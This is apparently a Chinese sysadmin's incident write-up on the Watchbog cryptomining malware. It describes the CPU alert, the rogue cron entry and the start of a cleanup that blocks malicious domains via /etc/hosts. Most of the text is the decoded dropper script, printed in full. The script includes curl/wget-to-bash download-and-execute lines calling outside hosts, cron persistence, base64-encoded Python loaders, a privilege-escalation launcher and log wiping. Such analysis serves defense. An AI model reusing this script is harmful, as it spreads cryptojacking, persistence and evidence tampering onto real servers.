Watchbog挖矿病毒程序排查过程
第1章 情况
1)服务器收到cpu报警,cpu被占用达到100%,登录服务器查看,发现cpu被一个watchbog的进程占满了,如下图所示:
2)并且无论如何都杀不掉,用kill杀掉后,其还是会隔一会自动起来,很明显被加入了定时任务,果不其然系统自带的定时任务已经被入侵了,如下所示:
*/9 * * * * (curl -fsSL https://pastebin.com/raw/AgdgACUD||wget -q -O- https://pastebin.com/raw/AgdgACUD||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvw xG8").read()'||curl -fsSL https://gitee.com/return_block/party_1/raw/master/main/api/README.md||wget -q -O - https://gitee.com/return_block/party_1/raw/master/main/api/README.md||curl -fsS L https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash
打开这个URL,发现像是一堆base64的密文,密文地址,使用base64解密出来是这个样的,下面是解密后的脚本,详情如下:
#!/bin/bash SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin #This is the TnF job copy function system() { rm -rf /bin/httpntp grep -v "/bin/httpntp" /etc/crontab > /etc/crontab.bak && mv /etc/crontab.bak /etc/crontab if [ ! -f "/bin/httpntp" ]; then curl -fsSL https://pastebin.com/raw/3XEzey2T -o /bin/httpntp && chmod 755 /bin/httpntp if [ ! -f "/bin/httpntp" ]; then wget https://pastebin.com/raw/3XEzey2T -O /bin/httpntp && chmod 755 /bin/httpntp fi if [ ! -f "/etc/crontab" ]; then echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab else echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab fi fi } function dragon() { nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKI3NpbXBsZSBodHRwX2JvdAppbXBvcnQgdXJsbGliCmltcG9ydCBiYXNlNjQKaW1wb3J0IG9zCgpkZWYgc29zKCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzA1cDBmVFlkJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBmID0gb3MucG9wZW4oc3RyKHBhZ2UpKQogICAgZXhjZXB0OgogICAgICAgIHByaW50KCdmYWlsZWQgdG8gZXhlY3V0ZSBvcyBjb21tYW5kJykKICAgICAgICBwYXNzCgpkZWYgcnVuU2NyaXB0KCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0t4V1BGZUVuJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoJ2ZhaWxlZCB0byBleGVjdXRlIG9zIHB5dGhvbiBzY3JpcHQnKQogICAgICAgIHBhc3MKCmQ9ICdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvWDZ3dnV2OTgnCnRyeToKICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3BlbihkKS5yZWFkKCkpCiAgICBpZiBwYWdlID09ICdvcyc6CiAgICAgICAgc29zKCkKICAgIGVsaWYgcGFnZSA9PSAnc2NyaXB0JzoKICAgICAgICBydW5TY3JpcHQoKQogICAgZWxzZToKICAgICAgICBwcmludCgnSSBjYW5cJ3QgdW5kZXJzdGFuZCB0aGUgYWN0aW9uIGFtIGdpdmVuJykKZXhjZXB0OgogICAgcHJpbnQoJ1NvcnJ5IGJvc3MgSSBjYW5cJ3QgZ2V0IGluc3RydWN0aW9ucycpCiAgICBwYXNzCg=='))" >/dev/null 2>&1 & touch /tmp/.tmpza } function cronhigh() { chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root rm -rf /etc/cron.hourly/Anacron /etc/cron.daily/Anacron /etc/cron.monthly/Anacron echo -e "*/3 * * * * root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/root echo -e "*/5 * * * * root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/system echo -e "*/7 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo -e "*/9 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/crontabs/root mkdir -p /etc/cron.hourly curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron if [ ! -f "/etc/cron.hourly/Anacron" ]; then wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron fi mkdir -p /etc/cron.daily curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron if [ ! -f "/etc/cron.daily/Anacron" ]; then wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron fi mkdir -p /etc/cron.monthly curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron if [ ! -f "/etc/cron.monthly/Anacron" ]; then wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron fi touch -acmr /bin/sh /var/spool/cron/root touch -acmr /bin/sh /var/spool/cron/crontabs/root touch -acmr /bin/sh /etc/cron.d/system touch -acmr /bin/sh /etc/cron.d/root touch -acmr /bin/sh /etc/cron.hourly/Anacron touch -acmr /bin/sh /etc/cron.daily/Anacron touch -acmr /bin/sh /etc/cron.monthly/Anacron } function cronlow() { cr=$(crontab -l | grep -q "https://pastebin.com/raw/3XEzey2T" | wc -l) if [ ${cr} -eq 0 ];then echo "Cron dosen't exists" crontab -r (crontab -l 2>/dev/null; echo "*/1 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash > /dev/null 2>&1")| crontab - else echo "Cron exists" fi } function downloadlow() { pa=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l) if [ ${pa} -eq 0 ];then mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/* if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json" ]; then curl -fsSL https://ptpb.pw/WpNh | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json" ]; then wget https://ptpb.pw/WpNh -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json fi fi ARCH=$(uname -m) if [ "$ARCH" == "x86_64" ]; then if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then curl -fsSL https://ptpb.pw/D8r9 -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then wget https://ptpb.pw/D8r9 -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog fi cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ nohup ./watchbog >/dev/null 2>&1 & else cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ nohup ./watchbog >/dev/null 2>&1 & fi elif [ "$ARCH" == "i686" ]; then if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then wget https://pixeldra.in/api/download/nZ2s4L -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog fi cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ nohup ./watchbog >/dev/null 2>&1 & else cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ nohup ./watchbog >/dev/null 2>&1 & fi else if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then wget https://pixeldra.in/api/download/nZ2s4L -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog fi cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ nohup ./watchbog >/dev/null 2>&1 & else cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ nohup ./watchbog >/dev/null 2>&1 & fi fi fi } function downloadhigh() { pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l) if [ ${pb} -eq 0 ];then rm -rf /bin/config.json /bin/watchbog if [ ! -f "/bin/config.json" ]; then curl -fsSL https://ptpb.pw/WpNh | base64 -d > /bin/config.json && chmod 777 /bin/config.json if [ ! -f "/bin/config.json" ]; then wget https://ptpb.pw/WpNh -O - | base64 -d > /bin/config.json && chmod 777 /bin/config.json fi fi ARCH=$(uname -m) if [ "$ARCH" == "x86_64" ]; then if [ ! -f "/bin/watchbog" ]; then curl -fsSL https://ptpb.pw/D8r9 -o /bin/watchbog && chmod 777 /bin/watchbog if [ ! -f "/bin/watchbog" ]; then wget https://ptpb.pw/D8r9 -O /bin/watchbog && chmod 777 /bin/watchbog fi cd /bin/ nohup ./watchbog >/dev/null 2>&1 & else cd /bin/ nohup ./watchbog >/dev/null 2>&1 & fi elif [ "$ARCH" == "i686" ]; then if [ ! -f "/bin/watchbog" ]; then curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /bin/watchbog && chmod 777 /bin/watchbog if [ ! -f "/bin/watchbog" ]; then wget https://pixeldra.in/api/download/nZ2s4L -O /bin/watchbog && chmod 777 /bin/watchbog fi cd /bin/ nohup ./watchbog >/dev/null 2>&1 & else cd /bin/ nohup ./watchbog >/dev/null 2>&1 & fi else if [ ! -f "/bin/watchbog" ]; then curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /bin/watchbog && chmod 777 /bin/watchbog if [ ! -f "/bin/watchbog" ]; then wget https://pixeldra.in/api/download/nZ2s4L -O /bin/watchbog && chmod 777 /bin/watchbog fi cd /bin/ nohup ./watchbog >/dev/null 2>&1 & else cd /bin/ nohup ./watchbog >/dev/null 2>&1 & fi fi fi } function testhigh() { pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l) if [ ${pb} -eq 0 ];then rm -rf /bin/watchbog /bin/config.json if [ ! -f "/bin/config.txt" ]; then curl -fsSL https://ptpb.pw/KAlo | base64 -d > /bin/config.txt && chmod 777 /bin/config.txt if [ ! -f "/bin/config.txt" ]; then wget https://ptpb.pw/KAlo -O - | base64 -d > /bin/config.txt && chmod 777 /bin/config.txt fi fi if [ ! -f "/bin/cpu.txt" ]; then curl -fsSL https://ptpb.pw/Nqo- | base64 -d > /bin/cpu.txt && chmod 777 /bin/cpu.txt if [ ! -f "/bin/cpu.txt" ]; then wget https://ptpb.pw/Nqo- -O - | base64 -d > /bin/cpu.txt && chmod 777 /bin/cpu.txt fi fi if [ ! -f "/bin/pools.txt" ]; then curl -fsSL https://ptpb.pw/9Lyg | base64 -d > /bin/pools.txt && chmod 777 /bin/pools.txt if [ ! -f "/bin/pools.txt" ]; then wget https://ptpb.pw/9Lyg -O - | base64 -d > /bin/pools.txt && chmod 777 /bin/pools.txt fi fi ARCH=$(uname -m) if [ "$ARCH" == "x86_64" ]; then if [ ! -f "/bin/watchbog" ]; then curl -fsSL https://ptpb.pw/mNJt -o /bin/watchbog && chmod 777 /bin/watchbog if [ ! -f "/bin/watchbog" ]; then wget https://ptpb.pw/mNJt -O /bin/watchbog && chmod 777 /bin/watchbog fi cd /bin/ nohup ./watchbog >/dev/null 2>&1 & else cd /bin/ nohup ./watchbog >/dev/null 2>&1 & fi else rm -rf /bin/cpu.txt /bin/pools.txt /bin/config.txt fi fi } function testlow() { pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l) if [ ${pb} -eq 0 ];then mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/* if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt" ]; then curl -fsSL https://ptpb.pw/KAlo | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt" ]; then wget https://ptpb.pw/KAlo -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt fi fi if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt" ]; then curl -fsSL https://ptpb.pw/Nqo- | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt" ]; then wget https://ptpb.pw/Nqo- -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt fi fi if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt" ]; then curl -fsSL https://ptpb.pw/9Lyg | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt" ]; then wget https://ptpb.pw/9Lyg -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt fi fi ARCH=$(uname -m) if [ "$ARCH" == "x86_64" ]; then if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then curl -fsSL https://ptpb.pw/mNJt -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then wget https://ptpb.pw/mNJt -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog fi cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ nohup ./watchbog >/dev/null 2>&1 & else cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ nohup ./watchbog >/dev/null 2>&1 & fi else rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt fi fi } function successhigh() { (curl -fsSL https://pastebin.com/raw/eCZwXCiK || wget -q -O - https://pastebin.com/raw/eCZwXCiK) touch /tmp/.tmpc } function successlow() { (curl -fsSL https://pastebin.com/raw/fMXdbHRs || wget -q -O - https://pastebin.com/raw/fMXdbHRs) touch /tmp/.tmpc } function elevate() { ARCH=$(uname -m) if [ "$ARCH" == "x86_64" ]; then echo "The Arch Is Supported lets GO On" python -V >/dev/null 2>&1 if [ "$?" = "0" ]; then echo "Python Is Avalaible lets GO On" python -c "import base64;exec(base64.b64decode('aW1wb3J0IGhhc2hsaWIKaW1wb3J0IG9zCmltcG9ydCBvcy5wYXRoCmltcG9ydCB0aW1lCgpqb2tlX2RpYyA9IFsKICAgICc0LjQuMC0zMS1nZW5lcmljJywKICAgICc0LjQuMC02Mi1nZW5lcmljJywKICAgICc0LjQuMC04MS1nZW5lcmljJywKICAgICc0LjQuMC0xMTYtZ2VuZXJpYycsCiAgICAnNC44LjAtNTgtZ2VuZXJpYycsCiAgICAnNC4xMC4wLjQyLWdlbmVyaWMnLAogICAgJzQuMTMuMC0yMS1nZW5lcmljJywKICAgICc0LjkuMC0zLWFtZDY0JywKICAgICc0LjkuMC1kZWVwaW4xMy1hbWQ2NCcsCiAgICAnNC44LjAtNTItZ2VuZXJpYycsCiAgICAnNC44LjYtMzAwLmZjMjUueDg2XzY0JywKICAgICc0LjExLjgtMzAwLmZjMjYueDg2XzY0JywKICAgICc0LjEzLjktMzAwLmZjMjcueDg2XzY0JywKICAgICc0LjUuMi1hdWZzLXInLAogICAgJzQuNC4wLTg5LWdlbmVyaWMnLAogICAgJzQuOC4wLTU4LWdlbmVyaWMnLAogICAgJzQuMTMuMC0xNi1nZW5lcmljJywKICAgICc0LjkuMzUtZGVza3RvcC0xLm1nYTYnLAogICAgJzQuNC4yOC0yLU1BTkpBUk8nLAogICAgJzQuMTIuNy0xMS5jdXJyZW50JywKICAgICc0LjQuMC04OS1nZW5lcmljJywKICAgICc0LjguMC00NS1nZW5lcmljJywKICAgICc0LjEwLjAtMjgtZ2VuZXJpYycsCiAgICAnNC4xMC4wLTE5LWdlbmVyaWMnLAogICAgJzQuOC4wLTM5LWdlbmVyaWMnXQoKbXlfa2VybmVsX3ZlciA9IG9zLnBvcGVuKCd1bmFtZSAtcicpLnJlYWQoKS5zdHJpcCgpICMKCmNvbSA9ICcnJ25vaHVwIGJhc2ggLWMgJyhjdXJsIC1mc1NMIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy8zWEV6ZXkyVHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzNYRXpleTJUKXxiYXNoJyA+L2Rldi9udWxsIDI+JjEgJgpybSAtcmYgL3RtcC9hY3RpdmF0ZScnJwoKZGVmIG1kNUNoZWNrc3VtKGZpbGVQYXRoKToKICAgIHdpdGggb3BlbihmaWxlUGF0aCwgJ3JiJykgYXMgZmg6CiAgICAgICAgbSA9IGhhc2hsaWIubWQ1KCkKICAgICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICBkYXRhID0gZmgucmVhZCg4MTkyKQogICAgICAgICAgICBpZiBub3QgZGF0YToKICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIG0udXBkYXRlKGRhdGEpCiAgICAgICAgcmV0dXJuIG0uaGV4ZGlnZXN0KCkKCmRlZiBtYWluKCk6CiAgICBHb0pva2UgPSBteV9rZXJuZWxfdmVyIGluIGpva2VfZGljCiAgICBmID0gb3BlbignL3RtcC9hY3RpdmF0ZScsICd3JykKICAgIGYud3JpdGUoY29tKQogICAgZi5jbG9zZSgpICAgIAogICAgaWYgR29Kb2tlOgogICAgICAgIGlmIG9zLnBhdGguZXhpc3RzKCcvdXNyL2Jpbi93Z2V0JykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdXNyL2Jpbi93Z2V0Jyk6CiAgICAgICAgICAgIG9zLnN5c3RlbSgnd2dldCBodHRwczovL3BpeGVsZHJhLmluL2FwaS9kb3dubG9hZC84aUZFRWcgLU8gL3RtcC9lbGF2YXRlICYmIGNobW9kIDc3NyAvdG1wL2VsYXZhdGUgJiYgY2htb2QgK3ggL3RtcC9lbGF2YXRlJykKICAgICAgICBlbGlmIG9zLnBhdGguZXhpc3RzKCcvdXNyL2Jpbi9jdXJsJykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdXNyL2Jpbi9jdXJsJyk6CiAgICAgICAgICAgIG9zLnN5c3RlbSgnY3VybCBodHRwczovL3BpeGVsZHJhLmluL2FwaS9kb3dubG9hZC84aUZFRWcgLW8gL3RtcC9lbGF2YXRlICYmIGNobW9kIDc3NyAvdG1wL2VsYXZhdGUgJiYgY2htb2QgK3ggL3RtcC9lbGF2YXRlJykKICAgICAgICBlbHNlOgogICAgICAgICAgICByZXR1cm4KICAgICAgICBpZiBvcy5wYXRoLmV4aXN0cygnL3RtcC9lbGF2YXRlJykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdG1wL2VsYXZhdGUnKToKICAgICAgICAgICAgaWYgbWQ1Q2hlY2tzdW0oJy90bXAvZWxhdmF0ZScpPT0nMTU3NDk1ZjZiYThjMzZjMzg5ODRkMWY5MDJjZjNhYzAnOgogICAgICAgICAgICAgICAgb3Muc3lzdGVtKCdjZCAvdG1wLyAmJiAuL2VsYXZhdGUgPCBhY3RpdmF0ZScpCiAgICAgICAgICAgICAgICB0aW1lLnNsZWVwKDEwKQogICAgZWxzZToKICAgICAgICByZXR1cm4KCm1haW4oKQo='))" >/dev/null 2>&1 else cronlow downloadlow fi sleep 30 if [ ! -f "/tmp/activate" ]; then echo "I guess The Exploit worked" pmp=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l) if [ ${pmp} -ne 0 ];then pup=$(ps auxf | grep 'watchbog' | grep -v grep | awk '{print $1}') if [ "$pup" == "root" ];then echo "The Exploit worked Successfully" echo "Hahahahha" rm -rf /tmp/elevate cronlow exit 0 else cronlow downloadlow fi else cronlow downloadlow fi else rm -rf /tmp/elevate rm -rf /tmp/activate cronlow downloadlow fi else cronlow downloadlow fi } update=$( (curl -fsSL --max-time 120 https://pastebin.com/raw/2unJiD3b) ) if [ "$update" == "update"x ];then echo "An update exists boss" rm -rf /tmp/.tmpza if [ ! -f "/tmp/.tmpold" ]; then spreada fi else echo "NO update exists boss" fi BS=$( whoami ) echo "I am $BS" if [ ! -f "/tmp/.tmpnewasss" ]; then touch /tmp/.tmpnewasss rm /tmp/.tmpnewzz ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9 pkill -f watchbog fi if [ "$BS" != "root" ];then if [ ! -f "/tmp/.tmpleve" ]; then crontab -r ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9 pkill -f watchbog fi ps -fe|grep 'watchbog'|grep -v grep|wc -l if [ $? -ne 0 ];then echo "It's running boss" crontab -r cronlow else if [ ! -f "/tmp/.tmpleve" ]; then rm -rf /tmp/.tmpelev touch /tmp/.tmpleve elevate else downloadlow fi cronlow sleep 15 if [ ${pm} -eq 0 ];then testlow fi pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l) if [ ${pm} -ne 0 ];then if [ ! -f "/tmp/.tmpc" ]; then successlow fi fi fi fi if [ "$BS" == "root" ];then ps -fe|grep 'watchbog'|grep -v grep|wc -l if [ $? -ne 0 ];then echo "It's running boss" system cronhigh downloadhigh else system cronhigh downloadhigh sleep 15 pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l) if [ ${pm} -ne 0 ];then if [ ! -f "/tmp/.tmpc" ]; then successhigh fi fi sleep 30 if [ ${pm} -eq 0 ];then testhigh if [ ${pm} -ne 0 ];then successhigh fi fi if [ ${pm} -eq 0 ];then downloadlow if [ ${pm} -ne 0 ];then successlow fi fi if [ ${pm} -eq 0 ];then testlow if [ ${pm} -ne 0 ];then successlow fi fi fi echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron sed -i '/pastebin/d' /var/log/syslog sed -i '/github/d' /var/log/syslog echo 0>/var/spool/mail/root fi
3)当我们清除掉定时任务的内容之后,隔了一会,其又被加入了如上一模一样的内容,所以该病毒程序不是一般的病毒程序。
4)经过后来的了解,我们了解到了该进程watchbog为被植入的挖矿程序,该程序会在cron下面写入脚本,定期去pastebin.com下载木马开始挖矿,如果删除不彻底仍然会不定期启动这个挖矿程序,对我们的系统造成危害,影响的系统中再跑的其他业务。
5)在进行清理watchbog这个挖矿进程的过程中,我一开始虽然限制住了该watchog进程,因为能力有限,没有彻底清除掉,就是因为没有彻底清除掉该watchbog进程,其造成了我系统中再跑的rabbitmq服务每天都会宕机,一开始博主本人还一直在研究rabbitmq的报错日志,浪费了很多时间,后来通过rabbitmq宕机的时间规律,结合系统定时任务发现,是遗留的watchbog进程影响到了rabbitmq的正常运行。
第2章 解决方案
2.1 修改/etc/hosts
通过观察定时任务内容,我们可以发现几个恶意网址,分别如下:
1) ptpb.pw
2) pastebin.com
3) gitee.com
4) aziplcr72qjhzvin.onion.to
